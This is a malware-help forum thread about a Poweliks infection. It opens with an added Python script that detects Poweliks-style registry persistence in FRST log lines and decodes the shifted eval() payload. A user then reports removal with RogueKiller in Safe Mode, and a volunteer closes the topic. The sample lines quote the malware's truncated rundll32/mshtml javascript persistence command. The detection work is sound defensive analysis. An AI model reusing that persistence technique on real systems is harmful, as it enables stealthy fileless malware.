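As an added example (not from the thread, and not part of FRST or RogueKiller), a small Python triage script over the Registry lines quoted in the log above. It flags the traits that make the flagged entry Poweliks-style persistence (a CLSID's LocalServer32 value that launches rundll32.exe with a javascript: URL and mshtml's RunHTMLApplication, then eval()s an encoded string) and decodes the eval() argument, which is stored with every character shifted up by one code point, so `epdvnfou/xsjuf` is `document.write`. The sample lines are copied from the posted log; the rule names and function names are my own.

```python
"""Flag Poweliks-style COM-hijack persistence in FRST registry lines and decode
the shifted script body.  Added example, not part of the thread or of FRST."""
import re
from typing import Dict, List

# Constructed sample input: four Registry-section lines copied from the FRST log
# posted in the thread (the third one is the entry FRST marked as Poweliks).
SAMPLE_FRST_LINES: List[str] = [
    r"HKLM-x32\...\Run: [ClamWin] => C:\Program Files (x86)\ClamWin\bin\ClamTray.exe [86016 2013-04-27] (alch)",
    r"HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\MountPoints2: {813b7de2-21a9-11e3-9251-c89cdc6c6e74} - G:\Autorun.exe",
    r'HKU\S-1-5-21-2928345798-992241452-311034125-1011\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!',
    r"HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_12_0_0_70_ActiveX.exe -update activex",
]

# Each rule is (reason, compiled pattern).  The value under a CLSID's
# LocalServer32 key is what COM launches for that class; a script engine
# there instead of an .exe path is what FRST is flagging in this log.
INDICATORS = [
    ("LocalServer32 points at rundll32 with a javascript: URL",
     re.compile(r"localserver32:\s*rundll32\.exe\s+javascript:", re.I)),
    ("mshtml RunHTMLApplication used as script host",
     re.compile(r"mshtml,RunHTMLApplication", re.I)),
    ("eval() of an encoded string inside a registry value",
     re.compile(r'eval\("', re.I)),
]

# The encoded argument of eval("..."); FRST truncates long values, so the
# capture stops at the first quote or whitespace rather than a closing paren.
EVAL_PAYLOAD = re.compile(r'eval\("([^"\s]+)')


def find_poweliks_indicators(lines: List[str]) -> List[Dict]:
    """Return one record per line that matches at least one indicator rule."""
    hits = []
    for line in lines:
        reasons = [reason for reason, pat in INDICATORS if pat.search(line)]
        if reasons:
            hits.append({"line": line, "reasons": reasons})
    return hits


def extract_eval_payload(line: str) -> str:
    """Return the encoded eval() argument from a log line, or '' if absent."""
    m = EVAL_PAYLOAD.search(line)
    return m.group(1) if m else ""


def decode_shifted(text: str, shift: int = 1) -> str:
    """Undo the per-character shift: every code point was raised by `shift`
    (so 'e' stands for 'd' and '/' for '.').  Pure data transform, nothing is
    executed; the result is only for reading what the value would have run."""
    return "".join(chr(ord(c) - shift) for c in text)


def triage(lines: List[str]) -> List[Dict]:
    """Run the rules and attach the decoded payload prefix to each hit."""
    report = []
    for hit in find_poweliks_indicators(lines):
        encoded = extract_eval_payload(hit["line"])
        hit["decoded_prefix"] = decode_shifted(encoded) if encoded else ""
        report.append(hit)
    return report


if __name__ == "__main__":
    for hit in triage(SAMPLE_FRST_LINES):
        print("SUSPECT:", hit["line"][:80], "...")
        for reason in hit["reasons"]:
            print("   -", reason)
        if hit["decoded_prefix"]:
            print("   decoded prefix:", hit["decoded_prefix"])
```

Only the prefix FRST printed can be decoded here, because the log itself cuts the value short; on a live system the full value would be read from the CLSID key before deletion so the complete script can be reviewed.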





#2 feralfreak

  • Topic Starter

  • Members
  • 38 posts

Posted 27 October 2014 - 03:20 AM

My problem might be fixed now. A buddy of mine at castlegrayskull told me I was doing the RogueKiller scan wrong; he said I had to go into Safe Mode (apparently there are things that don't run in Safe Mode that this infection needs, and that gives a chance to kill it) and then run it, which I did. Then when it found it (Poweliks) I did what the page that popped up told me: stopped the dllhost things in Task Manager and then hit delete, followed by an immediate reboot. It's been about 10 minutes and no issues yet.

 

Edit: some hours passed, no dll crap. Moderators, I think it's safe to close this if you wish.


Edited by feralfreak, 27 October 2014 - 07:33 AM.


#3 pystryker


  • Malware Response Team
  • 730 posts

Posted 27 October 2014 - 02:36 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.







